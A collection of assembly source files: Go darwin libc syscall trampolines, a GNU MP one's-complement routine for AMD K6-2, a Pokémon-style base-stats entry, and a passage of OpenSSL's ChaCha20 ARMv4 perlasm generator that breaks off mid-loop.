TEXT ·libc_exit_trampoline(SB),NOSPLIT,$0-0
JMP libc_exit(SB)
TEXT ·libc_faccessat_trampoline(SB),NOSPLIT,$0-0
JMP libc_faccessat(SB)
TEXT ·libc_fchdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchdir(SB)
TEXT ·libc_fchflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchflags(SB)
TEXT ·libc_fchmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmod(SB)
TEXT ·libc_fchmodat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmodat(SB)
TEXT ·libc_fchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchown(SB)
TEXT ·libc_fchownat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchownat(SB)
TEXT ·libc_flock_trampoline(SB),NOSPLIT,$0-0
JMP libc_flock(SB)
TEXT ·libc_fpathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_fpathconf(SB)
TEXT ·libc_fsync_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsync(SB)
TEXT ·libc_ftruncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_ftruncate(SB)
TEXT ·libc_getdtablesize_trampoline(SB),NOSPLIT,$0-0
JMP libc_getdtablesize(SB)
TEXT ·libc_getegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getegid(SB)
TEXT ·libc_geteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_geteuid(SB)
TEXT ·libc_getgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgid(SB)
TEXT ·libc_getpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgid(SB)
TEXT ·libc_getpgrp_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgrp(SB)
TEXT ·libc_getpid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpid(SB)
TEXT ·libc_getppid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getppid(SB)
TEXT ·libc_getpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpriority(SB)
TEXT ·libc_getrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrlimit(SB)
TEXT ·libc_getrusage_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrusage(SB)
TEXT ·libc_getsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsid(SB)
TEXT ·libc_getuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getuid(SB)
TEXT ·libc_issetugid_trampoline(SB),NOSPLIT,$0-0
JMP libc_issetugid(SB)
TEXT ·libc_kqueue_trampoline(SB),NOSPLIT,$0-0
JMP libc_kqueue(SB)
TEXT ·libc_lchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_lchown(SB)
TEXT ·libc_link_trampoline(SB),NOSPLIT,$0-0
JMP libc_link(SB)
TEXT ·libc_linkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_linkat(SB)
TEXT ·libc_listen_trampoline(SB),NOSPLIT,$0-0
JMP libc_listen(SB)
TEXT ·libc_mkdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdir(SB)
TEXT ·libc_mkdirat_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdirat(SB)
TEXT ·libc_mkfifo_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkfifo(SB)
TEXT ·libc_mknod_trampoline(SB),NOSPLIT,$0-0
JMP libc_mknod(SB)
TEXT ·libc_open_trampoline(SB),NOSPLIT,$0-0
JMP libc_open(SB)
TEXT ·libc_openat_trampoline(SB),NOSPLIT,$0-0
JMP libc_openat(SB)
TEXT ·libc_pathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_pathconf(SB)
TEXT ·libc_pread_trampoline(SB),NOSPLIT,$0-0
JMP libc_pread(SB)
TEXT ·libc_pwrite_trampoline(SB),NOSPLIT,$0-0
JMP libc_pwrite(SB)
TEXT ·libc_read_trampoline(SB),NOSPLIT,$0-0
JMP libc_read(SB)
TEXT ·libc_readlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlink(SB)
TEXT ·libc_readlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlinkat(SB)
TEXT ·libc_rename_trampoline(SB),NOSPLIT,$0-0
JMP libc_rename(SB)
TEXT ·libc_renameat_trampoline(SB),NOSPLIT,$0-0
JMP libc_renameat(SB)
TEXT ·libc_revoke_trampoline(SB),NOSPLIT,$0-0
JMP libc_revoke(SB)
TEXT ·libc_rmdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_rmdir(SB)
TEXT ·libc_lseek_trampoline(SB),NOSPLIT,$0-0
JMP libc_lseek(SB)
TEXT ·libc_select_trampoline(SB),NOSPLIT,$0-0
JMP libc_select(SB)
TEXT ·libc_setegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setegid(SB)
TEXT ·libc_seteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_seteuid(SB)
TEXT ·libc_setgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgid(SB)
TEXT ·libc_setlogin_trampoline(SB),NOSPLIT,$0-0
JMP libc_setlogin(SB)
TEXT ·libc_setpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpgid(SB)
TEXT ·libc_setpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpriority(SB)
TEXT ·libc_setprivexec_trampoline(SB),NOSPLIT,$0-0
JMP libc_setprivexec(SB)
TEXT ·libc_setregid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setregid(SB)
TEXT ·libc_setreuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setreuid(SB)
TEXT ·libc_setrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_setrlimit(SB)
TEXT ·libc_setsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsid(SB)
TEXT ·libc_settimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_settimeofday(SB)
TEXT ·libc_setuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setuid(SB)
TEXT ·libc_symlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlink(SB)
TEXT ·libc_symlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlinkat(SB)
TEXT ·libc_sync_trampoline(SB),NOSPLIT,$0-0
JMP libc_sync(SB)
TEXT ·libc_truncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_truncate(SB)
TEXT ·libc_umask_trampoline(SB),NOSPLIT,$0-0
JMP libc_umask(SB)
TEXT ·libc_undelete_trampoline(SB),NOSPLIT,$0-0
JMP libc_undelete(SB)
TEXT ·libc_unlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlink(SB)
TEXT ·libc_unlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlinkat(SB)
TEXT ·libc_unmount_trampoline(SB),NOSPLIT,$0-0
JMP libc_unmount(SB)
TEXT ·libc_write_trampoline(SB),NOSPLIT,$0-0
JMP libc_write(SB)
TEXT ·libc_mmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_mmap(SB)
TEXT ·libc_munmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_munmap(SB)
TEXT ·libc_ptrace_trampoline(SB),NOSPLIT,$0-0
JMP libc_ptrace(SB)
TEXT ·libc_gettimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_gettimeofday(SB)
TEXT ·libc_fstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstat64(SB)
TEXT ·libc_fstatat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatat64(SB)
TEXT ·libc_fstatfs64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatfs64(SB)
TEXT ·libc___getdirentries64_trampoline(SB),NOSPLIT,$0-0
JMP libc___getdirentries64(SB)
TEXT ·libc_getfsstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_getfsstat64(SB)
TEXT ·libc_lstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_lstat64(SB)
TEXT ·libc_stat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_stat64(SB)
TEXT ·libc_statfs64_trampoline(SB),NOSPLIT,$0-0
JMP libc_statfs64(SB)
| {
"language": "Assembly"
} |
dnl AMD K6-2 mpn_com -- mpn bitwise one's complement.
dnl Copyright 1999-2002 Free Software Foundation, Inc.
dnl This file is part of the GNU MP Library.
dnl
dnl The GNU MP Library is free software; you can redistribute it and/or modify
dnl it under the terms of either:
dnl
dnl * the GNU Lesser General Public License as published by the Free
dnl Software Foundation; either version 3 of the License, or (at your
dnl option) any later version.
dnl
dnl or
dnl
dnl * the GNU General Public License as published by the Free Software
dnl Foundation; either version 2 of the License, or (at your option) any
dnl later version.
dnl
dnl or both in parallel, as here.
dnl
dnl The GNU MP Library is distributed in the hope that it will be useful, but
dnl WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
dnl or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
dnl for more details.
dnl
dnl You should have received copies of the GNU General Public License and the
dnl GNU Lesser General Public License along with the GNU MP Library. If not,
dnl see https://www.gnu.org/licenses/.
include(`../config.m4')
NAILS_SUPPORT(0-31)
C alignment dst/src, A=0mod8 N=4mod8
C A/A A/N N/A N/N
C K6-2 1.0 1.18 1.18 1.18 cycles/limb
C K6 1.5 1.85 1.75 1.85
C void mpn_com (mp_ptr dst, mp_srcptr src, mp_size_t size);
C
C Take the bitwise ones-complement of src,size and write it to dst,size.
defframe(PARAM_SIZE,12)
defframe(PARAM_SRC, 8)
defframe(PARAM_DST, 4)
TEXT
ALIGN(16)
PROLOGUE(mpn_com)
deflit(`FRAME',0)
movl PARAM_SIZE, %ecx
movl PARAM_SRC, %eax
movl PARAM_DST, %edx
shrl %ecx
jnz L(two_or_more)
movl (%eax), %eax
notl_or_xorl_GMP_NUMB_MASK( %eax)
movl %eax, (%edx)
ret
L(two_or_more):
pushl %ebx FRAME_pushl()
pcmpeqd %mm7, %mm7 C all ones
movl %ecx, %ebx
ifelse(GMP_NAIL_BITS,0,,
` psrld $GMP_NAIL_BITS, %mm7') C clear nails
ALIGN(8)
L(top):
C eax src
C ebx floor(size/2)
C ecx counter
C edx dst
C
C mm0 scratch
C mm7 mask
movq -8(%eax,%ecx,8), %mm0
pxor %mm7, %mm0
movq %mm0, -8(%edx,%ecx,8)
loop L(top)
jnc L(no_extra)
movl (%eax,%ebx,8), %eax
notl_or_xorl_GMP_NUMB_MASK( %eax)
movl %eax, (%edx,%ebx,8)
L(no_extra):
popl %ebx
emms_or_femms
ret
EPILOGUE()
| {
"language": "Assembly"
} |
db DEX_PUPURIN ; 174
db 50, 50, 50, 50, 50, 50
; hp atk def spd sat sdf
db TYPE_NORMAL, TYPE_NORMAL ; type
db 255 ; catch rate
db 100 ; base exp
db ITEM_BERRY, ITEM_STRANGE_POWER ; items
db GENDER_50_50 ; gender ratio
db 100, 4, 70 ; unknown
dn 5, 5 ; sprite dimensions
dw PupurinPicFront, PupurinPicBack ; sprites
db GROWTH_MEDIUM_SLOW ; growth rate
; tm/hm learnset
tmhm 1, 5, 6, 8, 9, 10, 11, 12, 13, 14, 15, 17, 18, 19, 20, 22, 24, 25, 29, 30, 31, 32, 33, 34, 35, 36, 38, 40, 44, 45, 46, 49, 50, 54, 55
; end
| {
"language": "Assembly"
} |
#! /usr/bin/env perl
# Copyright 2016 The OpenSSL Project Authors. All Rights Reserved.
#
# Licensed under the OpenSSL license (the "License"). You may not use
# this file except in compliance with the License. You can obtain a copy
# in the file LICENSE in the source distribution or at
# https://www.openssl.org/source/license.html
#
# ====================================================================
# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
# project. The module is, however, dual licensed under OpenSSL and
# CRYPTOGAMS licenses depending on where you obtain it. For further
# details see http://www.openssl.org/~appro/cryptogams/.
# ====================================================================
#
# December 2014
#
# ChaCha20 for ARMv4.
#
# Performance in cycles per byte out of large buffer.
#
# IALU/gcc-4.4 1xNEON 3xNEON+1xIALU
#
# Cortex-A5 19.3(*)/+95% 21.8 14.1
# Cortex-A8 10.5(*)/+160% 13.9 6.35
# Cortex-A9 12.9(**)/+110% 14.3 6.50
# Cortex-A15 11.0/+40% 16.0 5.00
# Snapdragon S4 11.5/+125% 13.6 4.90
#
# (*) most "favourable" result for aligned data on little-endian
# processor, result for misaligned data is 10-15% lower;
# (**) this result is a trade-off: it can be improved by 20%,
# but then Snapdragon S4 and Cortex-A8 results get
# 20-25% worse;
$flavour = shift;
if ($flavour=~/\w[\w\-]*\.\w+$/) { $output=$flavour; undef $flavour; }
else { while (($output=shift) && ($output!~/\w[\w\-]*\.\w+$/)) {} }
if ($flavour && $flavour ne "void") {
$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
( $xlate="${dir}../arm-xlate.pl" and -f $xlate ) or
( $xlate="${dir}../tools/arm-xlate.pl" and -f $xlate) or
die "can't locate arm-xlate.pl";
open STDOUT,"| \"$^X\" $xlate $flavour $output";
} else {
open STDOUT,">$output";
}
sub AUTOLOAD() # thunk [simplified] x86-style perlasm
{ my $opcode = $AUTOLOAD; $opcode =~ s/.*:://; $opcode =~ s/_/\./;
my $arg = pop;
$arg = "#$arg" if ($arg*1 eq $arg);
$code .= "\t$opcode\t".join(',',@_,$arg)."\n";
}
my @x=map("r$_",(0..7,"x","x","x","x",12,"x",14,"x"));
my @t=map("r$_",(8..11));
sub ROUND {
my ($a0,$b0,$c0,$d0)=@_;
my ($a1,$b1,$c1,$d1)=map(($_&~3)+(($_+1)&3),($a0,$b0,$c0,$d0));
my ($a2,$b2,$c2,$d2)=map(($_&~3)+(($_+1)&3),($a1,$b1,$c1,$d1));
my ($a3,$b3,$c3,$d3)=map(($_&~3)+(($_+1)&3),($a2,$b2,$c2,$d2));
my $odd = $d0&1;
my ($xc,$xc_) = (@t[0..1]);
my ($xd,$xd_) = $odd ? (@t[2],@x[$d1]) : (@x[$d0],@t[2]);
my @ret;
# Consider order in which variables are addressed by their
# index:
#
# a b c d
#
# 0 4 8 12 < even round
# 1 5 9 13
# 2 6 10 14
# 3 7 11 15
# 0 5 10 15 < odd round
# 1 6 11 12
# 2 7 8 13
# 3 4 9 14
#
# 'a', 'b' are permanently allocated in registers, @x[0..7],
# while 'c's and pair of 'd's are maintained in memory. If
# you observe 'c' column, you'll notice that pair of 'c's is
# invariant between rounds. This means that we have to reload
# them once per round, in the middle. This is why you'll see
# bunch of 'c' stores and loads in the middle, but none in
# the beginning or end. If you observe 'd' column, you'll
# notice that 15 and 13 are reused in next pair of rounds.
# This is why these two are chosen for offloading to memory,
# to make loads count more.
push @ret,(
"&add (@x[$a0],@x[$a0],@x[$b0])",
"&mov ($xd,$xd,'ror#16')",
"&add (@x[$a1],@x[$a1],@x[$b1])",
"&mov ($xd_,$xd_,'ror#16')",
"&eor ($xd,$xd,@x[$a0],'ror#16')",
"&eor ($xd_,$xd_,@x[$a1],'ror#16')",
"&add ($xc,$xc,$xd)",
"&mov (@x[$b0],@x[$b0],'ror#20')",
"&add ($xc_,$xc_,$xd_)",
"&mov (@x[$b1],@x[$b1],'ror#20')",
"&eor (@x[$b0],@x[$b0],$xc,'ror#20')",
"&eor (@x[$b1],@x[$b1],$xc_,'ror#20')",
"&add (@x[$a0],@x[$a0],@x[$b0])",
"&mov ($xd,$xd,'ror#24')",
"&add (@x[$a1],@x[$a1],@x[$b1])",
"&mov ($xd_,$xd_,'ror#24')",
"&eor ($xd,$xd,@x[$a0],'ror#24')",
"&eor ($xd_,$xd_,@x[$a1],'ror#24')",
"&add ($xc,$xc,$xd)",
"&mov (@x[$b0],@x[$b0],'ror#25')" );
push @ret,(
"&str ($xd,'[sp,#4*(16+$d0)]')",
"&ldr ($xd,'[sp,#4*(16+$d2)]')" ) if ($odd);
push @ret,(
"&add ($xc_,$xc_,$xd_)",
"&mov (@x[$b1],@x[$b1],'ror#25')" );
push @ret,(
"&str ($xd_,'[sp,#4*(16+$d1)]')",
"&ldr ($xd_,'[sp,#4*(16+$d3)]')" ) if (!$odd);
push @ret,(
"&eor (@x[$b0],@x[$b0],$xc,'ror#25')",
"&eor (@x[$b1],@x[$b1],$xc_,'ror#25')" );
$xd=@x[$d2] if (!$odd);
$xd_=@x[$d3] if ($odd);
push @ret,(
"&str ($xc,'[sp,#4*(16+$c0)]')",
"&ldr ($xc,'[sp,#4*(16+$c2)]')",
"&add (@x[$a2],@x[$a2],@x[$b2])",
"&mov ($xd,$xd,'ror#16')",
"&str ($xc_,'[sp,#4*(16+$c1)]')",
"&ldr ($xc_,'[sp,#4*(16+$c3)]')",
"&add (@x[$a3],@x[$a3],@x[$b3])",
"&mov ($xd_,$xd_,'ror#16')",
"&eor ($xd,$xd,@x[$a2],'ror#16')",
"&eor ($xd_,$xd_,@x[$a3],'ror#16')",
"&add ($xc,$xc,$xd)",
"&mov (@x[$b2],@x[$b2],'ror#20')",
"&add ($xc_,$xc_,$xd_)",
"&mov (@x[$b3],@x[$b3],'ror#20')",
"&eor (@x[$b2],@x[$b2],$xc,'ror#20')",
"&eor (@x[$b3],@x[$b3],$xc_,'ror#20')",
"&add (@x[$a2],@x[$a2],@x[$b2])",
"&mov ($xd,$xd,'ror#24')",
"&add (@x[$a3],@x[$a3],@x[$b3])",
"&mov ($xd_,$xd_,'ror#24')",
"&eor ($xd,$xd,@x[$a2],'ror#24')",
"&eor ($xd_,$xd_,@x[$a3],'ror#24')",
"&add ($xc,$xc,$xd)",
"&mov (@x[$b2],@x[$b2],'ror#25')",
"&add ($xc_,$xc_,$xd_)",
"&mov (@x[$b3],@x[$b3],'ror#25')",
"&eor (@x[$b2],@x[$b2],$xc,'ror#25')",
"&eor (@x[$b3],@x[$b3],$xc_,'ror#25')" );
@ret;
}
$code.=<<___;
#include "arm_arch.h"
.text
#if defined(__thumb2__) || defined(__clang__)
.syntax unified
#endif
#if defined(__thumb2__)
.thumb
#else
.code 32
#endif
#if defined(__thumb2__) || defined(__clang__)
#define ldrhsb ldrbhs
#endif
.align 5
.Lsigma:
.long 0x61707865,0x3320646e,0x79622d32,0x6b206574 @ endian-neutral
.Lone:
.long 1,0,0,0
#if __ARM_MAX_ARCH__>=7
.LOPENSSL_armcap:
.word OPENSSL_armcap_P-.LChaCha20_ctr32
#else
.word -1
#endif
.globl ChaCha20_ctr32
.type ChaCha20_ctr32,%function
.align 5
ChaCha20_ctr32:
.LChaCha20_ctr32:
ldr r12,[sp,#0] @ pull pointer to counter and nonce
stmdb sp!,{r0-r2,r4-r11,lr}
#if __ARM_ARCH__<7 && !defined(__thumb2__)
sub r14,pc,#16 @ ChaCha20_ctr32
#else
adr r14,.LChaCha20_ctr32
#endif
cmp r2,#0 @ len==0?
#ifdef __thumb2__
itt eq
#endif
addeq sp,sp,#4*3
beq .Lno_data
#if __ARM_MAX_ARCH__>=7
cmp r2,#192 @ test len
bls .Lshort
ldr r4,[r14,#-32]
ldr r4,[r14,r4]
# ifdef __APPLE__
ldr r4,[r4]
# endif
tst r4,#ARMV7_NEON
bne .LChaCha20_neon
.Lshort:
#endif
ldmia r12,{r4-r7} @ load counter and nonce
sub sp,sp,#4*(16) @ off-load area
sub r14,r14,#64 @ .Lsigma
stmdb sp!,{r4-r7} @ copy counter and nonce
ldmia r3,{r4-r11} @ load key
ldmia r14,{r0-r3} @ load sigma
stmdb sp!,{r4-r11} @ copy key
stmdb sp!,{r0-r3} @ copy sigma
str r10,[sp,#4*(16+10)] @ off-load "@x[10]"
str r11,[sp,#4*(16+11)] @ off-load "@x[11]"
b .Loop_outer_enter
.align 4
.Loop_outer:
ldmia sp,{r0-r9} @ load key material
str @t[3],[sp,#4*(32+2)] @ save len
str r12, [sp,#4*(32+1)] @ save inp
str r14, [sp,#4*(32+0)] @ save out
.Loop_outer_enter:
ldr @t[3], [sp,#4*(15)]
ldr @x[12],[sp,#4*(12)] @ modulo-scheduled load
ldr @t[2], [sp,#4*(13)]
ldr @x[14],[sp,#4*(14)]
str @t[3], [sp,#4*(16+15)]
mov @t[3],#10
b .Loop
.align 4
.Loop:
subs @t[3],@t[3],#1
___
foreach (&ROUND(0, 4, 8,12)) { eval; }
foreach (&ROUND(0, 5,10,15)) { eval; }
$code.=<<___;
bne .Loop
ldr @t[3],[sp,#4*(32+2)] @ load len
str @t[0], [sp,#4*(16+8)] @ modulo-scheduled store
str @t[1], [sp,#4*(16+9)]
str @x[12],[sp,#4*(16+12)]
str @t[2], [sp,#4*(16+13)]
str @x[14],[sp,#4*(16+14)]
@ at this point we have first half of 512-bit result in
@ @x[0-7] and second half at sp+4*(16+8)
cmp @t[3],#64 @ done yet?
#ifdef __thumb2__
itete lo
#endif
addlo r12,sp,#4*(0) @ shortcut or ...
ldrhs r12,[sp,#4*(32+1)] @ ... load inp
addlo r14,sp,#4*(0) @ shortcut or ...
ldrhs r14,[sp,#4*(32+0)] @ ... load out
ldr @t[0],[sp,#4*(0)] @ load key material
ldr @t[1],[sp,#4*(1)]
#if __ARM_ARCH__>=6 || !defined(__ARMEB__)
# if __ARM_ARCH__<7
orr @t[2],r12,r14
tst @t[2],#3 @ are input and output aligned?
ldr @t[2],[sp,#4*(2)]
bne .Lunaligned
cmp @t[3],#64 @ restore flags
# else
ldr @t[2],[sp,#4*(2)]
# endif
ldr @t[3],[sp,#4*(3)]
add @x[0],@x[0],@t[0] @ accumulate key material
add @x[1],@x[1],@t[1]
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[0],[r12],#16 @ load input
ldrhs @t[1],[r12,#-12]
add @x[2],@x[2],@t[2]
add @x[3],@x[3],@t[3]
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[2],[r12,#-8]
ldrhs @t[3],[r12,#-4]
# if __ARM_ARCH__>=6 && defined(__ARMEB__)
rev @x[0],@x[0]
rev @x[1],@x[1]
rev @x[2],@x[2]
rev @x[3],@x[3]
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs @x[0],@x[0],@t[0] @ xor with input
eorhs @x[1],@x[1],@t[1]
add @t[0],sp,#4*(4)
str @x[0],[r14],#16 @ store output
# ifdef __thumb2__
itt hs
# endif
eorhs @x[2],@x[2],@t[2]
eorhs @x[3],@x[3],@t[3]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
str @x[1],[r14,#-12]
str @x[2],[r14,#-8]
str @x[3],[r14,#-4]
add @x[4],@x[4],@t[0] @ accumulate key material
add @x[5],@x[5],@t[1]
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[0],[r12],#16 @ load input
ldrhs @t[1],[r12,#-12]
add @x[6],@x[6],@t[2]
add @x[7],@x[7],@t[3]
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[2],[r12,#-8]
ldrhs @t[3],[r12,#-4]
# if __ARM_ARCH__>=6 && defined(__ARMEB__)
rev @x[4],@x[4]
rev @x[5],@x[5]
rev @x[6],@x[6]
rev @x[7],@x[7]
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs @x[4],@x[4],@t[0]
eorhs @x[5],@x[5],@t[1]
add @t[0],sp,#4*(8)
str @x[4],[r14],#16 @ store output
# ifdef __thumb2__
itt hs
# endif
eorhs @x[6],@x[6],@t[2]
eorhs @x[7],@x[7],@t[3]
str @x[5],[r14,#-12]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
str @x[6],[r14,#-8]
add @x[0],sp,#4*(16+8)
str @x[7],[r14,#-4]
ldmia @x[0],{@x[0]-@x[7]} @ load second half
add @x[0],@x[0],@t[0] @ accumulate key material
add @x[1],@x[1],@t[1]
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[0],[r12],#16 @ load input
ldrhs @t[1],[r12,#-12]
# ifdef __thumb2__
itt hi
# endif
strhi @t[2],[sp,#4*(16+10)] @ copy "@x[10]" while at it
strhi @t[3],[sp,#4*(16+11)] @ copy "@x[11]" while at it
add @x[2],@x[2],@t[2]
add @x[3],@x[3],@t[3]
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[2],[r12,#-8]
ldrhs @t[3],[r12,#-4]
# if __ARM_ARCH__>=6 && defined(__ARMEB__)
rev @x[0],@x[0]
rev @x[1],@x[1]
rev @x[2],@x[2]
rev @x[3],@x[3]
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs @x[0],@x[0],@t[0]
eorhs @x[1],@x[1],@t[1]
add @t[0],sp,#4*(12)
str @x[0],[r14],#16 @ store output
# ifdef __thumb2__
itt hs
# endif
eorhs @x[2],@x[2],@t[2]
eorhs @x[3],@x[3],@t[3]
str @x[1],[r14,#-12]
ldmia @t[0],{@t[0]-@t[3]} @ load key material
str @x[2],[r14,#-8]
str @x[3],[r14,#-4]
add @x[4],@x[4],@t[0] @ accumulate key material
add @x[5],@x[5],@t[1]
# ifdef __thumb2__
itt hi
# endif
addhi @t[0],@t[0],#1 @ next counter value
strhi @t[0],[sp,#4*(12)] @ save next counter value
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[0],[r12],#16 @ load input
ldrhs @t[1],[r12,#-12]
add @x[6],@x[6],@t[2]
add @x[7],@x[7],@t[3]
# ifdef __thumb2__
itt hs
# endif
ldrhs @t[2],[r12,#-8]
ldrhs @t[3],[r12,#-4]
# if __ARM_ARCH__>=6 && defined(__ARMEB__)
rev @x[4],@x[4]
rev @x[5],@x[5]
rev @x[6],@x[6]
rev @x[7],@x[7]
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs @x[4],@x[4],@t[0]
eorhs @x[5],@x[5],@t[1]
# ifdef __thumb2__
it ne
# endif
ldrne @t[0],[sp,#4*(32+2)] @ re-load len
# ifdef __thumb2__
itt hs
# endif
eorhs @x[6],@x[6],@t[2]
eorhs @x[7],@x[7],@t[3]
str @x[4],[r14],#16 @ store output
str @x[5],[r14,#-12]
# ifdef __thumb2__
it hs
# endif
subhs @t[3],@t[0],#64 @ len-=64
str @x[6],[r14,#-8]
str @x[7],[r14,#-4]
bhi .Loop_outer
beq .Ldone
# if __ARM_ARCH__<7
b .Ltail
.align 4
.Lunaligned: @ unaligned endian-neutral path
cmp @t[3],#64 @ restore flags
# endif
#endif
#if __ARM_ARCH__<7
ldr @t[3],[sp,#4*(3)]
___
for ($i=0;$i<16;$i+=4) {
my $j=$i&0x7;
$code.=<<___ if ($i==4);
add @x[0],sp,#4*(16+8)
___
$code.=<<___ if ($i==8);
ldmia @x[0],{@x[0]-@x[7]} @ load second half
# ifdef __thumb2__
itt hi
# endif
strhi @t[2],[sp,#4*(16+10)] @ copy "@x[10]"
strhi @t[3],[sp,#4*(16+11)] @ copy "@x[11]"
___
$code.=<<___;
add @x[$j+0],@x[$j+0],@t[0] @ accumulate key material
___
$code.=<<___ if ($i==12);
# ifdef __thumb2__
itt hi
# endif
addhi @t[0],@t[0],#1 @ next counter value
strhi @t[0],[sp,#4*(12)] @ save next counter value
___
$code.=<<___;
add @x[$j+1],@x[$j+1],@t[1]
add @x[$j+2],@x[$j+2],@t[2]
# ifdef __thumb2__
itete lo
# endif
eorlo @t[0],@t[0],@t[0] @ zero or ...
ldrhsb @t[0],[r12],#16 @ ... load input
eorlo @t[1],@t[1],@t[1]
ldrhsb @t[1],[r12,#-12]
add @x[$j+3],@x[$j+3],@t[3]
# ifdef __thumb2__
itete lo
# endif
eorlo @t[2],@t[2],@t[2]
ldrhsb @t[2],[r12,#-8]
eorlo @t[3],@t[3],@t[3]
ldrhsb @t[3],[r12,#-4]
eor @x[$j+0],@t[0],@x[$j+0] @ xor with input (or zero)
eor @x[$j+1],@t[1],@x[$j+1]
# ifdef __thumb2__
itt hs
# endif
ldrhsb @t[0],[r12,#-15] @ load more input
ldrhsb @t[1],[r12,#-11]
eor @x[$j+2],@t[2],@x[$j+2]
strb @x[$j+0],[r14],#16 @ store output
eor @x[$j+3],@t[3],@x[$j+3]
# ifdef __thumb2__
itt hs
# endif
ldrhsb @t[2],[r12,#-7]
ldrhsb @t[3],[r12,#-3]
strb @x[$j+1],[r14,#-12]
eor @x[$j+0],@t[0],@x[$j+0],lsr#8
strb @x[$j+2],[r14,#-8]
eor @x[$j+1],@t[1],@x[$j+1],lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb @t[0],[r12,#-14] @ load more input
ldrhsb @t[1],[r12,#-10]
strb @x[$j+3],[r14,#-4]
eor @x[$j+2],@t[2],@x[$j+2],lsr#8
strb @x[$j+0],[r14,#-15]
eor @x[$j+3],@t[3],@x[$j+3],lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb @t[2],[r12,#-6]
ldrhsb @t[3],[r12,#-2]
strb @x[$j+1],[r14,#-11]
eor @x[$j+0],@t[0],@x[$j+0],lsr#8
strb @x[$j+2],[r14,#-7]
eor @x[$j+1],@t[1],@x[$j+1],lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb @t[0],[r12,#-13] @ load more input
ldrhsb @t[1],[r12,#-9]
strb @x[$j+3],[r14,#-3]
eor @x[$j+2],@t[2],@x[$j+2],lsr#8
strb @x[$j+0],[r14,#-14]
eor @x[$j+3],@t[3],@x[$j+3],lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb @t[2],[r12,#-5]
ldrhsb @t[3],[r12,#-1]
strb @x[$j+1],[r14,#-10]
strb @x[$j+2],[r14,#-6]
eor @x[$j+0],@t[0],@x[$j+0],lsr#8
strb @x[$j+3],[r14,#-2]
eor @x[$j+1],@t[1],@x[$j+1],lsr#8
strb @x[$j+0],[r14,#-13]
eor @x[$j+2],@t[2],@x[$j+2],lsr#8
strb @x[$j+1],[r14,#-9]
eor @x[$j+3],@t[3],@x[$j+3],lsr#8
strb @x[$j+2],[r14,#-5]
strb @x[$j+3],[r14,#-1]
___
$code.=<<___ if ($i<12);
add @t[0],sp,#4*(4+$i)
